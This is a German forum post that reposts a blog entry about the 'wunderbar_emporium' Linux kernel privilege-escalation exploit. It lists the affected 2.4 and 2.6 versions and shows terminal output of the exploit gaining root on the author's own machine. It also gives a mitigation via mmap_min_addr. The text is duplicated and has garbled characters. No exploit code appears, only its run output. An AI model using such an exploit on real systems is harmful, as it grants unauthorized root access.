Von meinem Blog gerade eben (dachte, es könnte ein paar Leute interessieren):
Mit dem exploit wunderbar_emporium kann man sich auf einem Linux Computer, auf dem man einen shell account mit normalen userrechten besitzt, innerhalb von Sekunden root-Rechte erschleichen. Ich habe nicht versucht, das Prinzip genauer zu verstehen, aber soweit ich mitbekommen habe, nutzt es Bugs in weitgehend unbekannten Protokollen, die deswegen noch nicht entdeckt wurden. Betroffen sind alle Linux-Versionen seit Mai 2001:
????????
Affected Software
????????
All Linux 2.4/2.6 versions since May 2001 are believed to be affected:
- Linux 2.4, from 2.4.4 up to and including 2.4.37.4
- Linux 2.6, from 2.6.0 up to and including 2.6.30.4
Ich habe es mal auf meinem eigenen Computer ausprobiert:
Die Ausgabe von ?whoami? zeigt, dass es innerhlab von weniger als einer Sekunde geklappt hat, root zu werden ? mit einem normalen User-Account.
Entweder ist das der Anfang einer Linux-Krise oder die Bugs sind schnell gefixt. Mich persönlich betrifft es weniger, da ich keinen Server am laufen habe. Aber verschiedene andere dürften sich wohl sorgen machen.
Das Exploit kann nicht ausgeführt werden, wenn man den Wert in ?/proc/sys/vm/mmap_min_addr? von 0 auf 1 ändert. Hier die Ausgabe:
Anscheinend gibts diese Datei aber nicht auf jedem Linux-Rechner...
Mit dem exploit wunderbar_emporium kann man sich auf einem Linux Computer, auf dem man einen shell account mit normalen userrechten besitzt, innerhalb von Sekunden root-Rechte erschleichen. Ich habe nicht versucht, das Prinzip genauer zu verstehen, aber soweit ich mitbekommen habe, nutzt es Bugs in weitgehend unbekannten Protokollen, die deswegen noch nicht entdeckt wurden. Betroffen sind alle Linux-Versionen seit Mai 2001:
????????
Affected Software
????????
All Linux 2.4/2.6 versions since May 2001 are believed to be affected:
- Linux 2.4, from 2.4.4 up to and including 2.4.37.4
- Linux 2.6, from 2.6.0 up to and including 2.6.30.4
Ich habe es mal auf meinem eigenen Computer ausprobiert:
Code:
athelstan@spaceshuttle:~/wunderbar_emporium$ ./wunderbar_emporium.sh
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc08653bc
[+] Resolved selinux_enabled to 0xc08653b8
[+] Resolved apparmor_enabled to 0xc06a0d84
[+] Resolved apparmor_complain to 0xc0866fb8
[+] Resolved apparmor_audit to 0xc0866fc0
[+] Resolved apparmor_logsyscall to 0xc0866fc4
[+] Resolved security_ops to 0xc0863b60
[+] Resolved default_security_ops to 0xc069fb40
[+] Resolved sel_read_enforce to 0xc0293a70
[+] Resolved audit_enabled to 0xc0822564
[+] got ring0!
[+] detected 2.6 style 8k stacks
sh: mplayer: not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
# whoami
root
#
Entweder ist das der Anfang einer Linux-Krise oder die Bugs sind schnell gefixt. Mich persönlich betrifft es weniger, da ich keinen Server am laufen habe. Aber verschiedene andere dürften sich wohl sorgen machen.
Das Exploit kann nicht ausgeführt werden, wenn man den Wert in ?/proc/sys/vm/mmap_min_addr? von 0 auf 1 ändert. Hier die Ausgabe:
Code:
athelstan@spaceshuttle:~/wunderbar_emporium$ ./wunderbar_emporium.sh [+] Personality set to: PER_SVR4
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
I: caps.c: Dropping root privileges.
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
E: alsa-util.c: Error opening PCM device hw:0: Device or resource busy
E: module.c: Failed to load module ?module-alsa-sink? (argument: ?device_id=0 sink_name=alsa_output.pci_8086_27d8_sound_card_0_alsa_playback_0 tsched=0″): initialization failed.
UNABLE TO MAP ZERO PAGE!
^C
athelstan@spaceshuttle:~/wunderbar_emporium$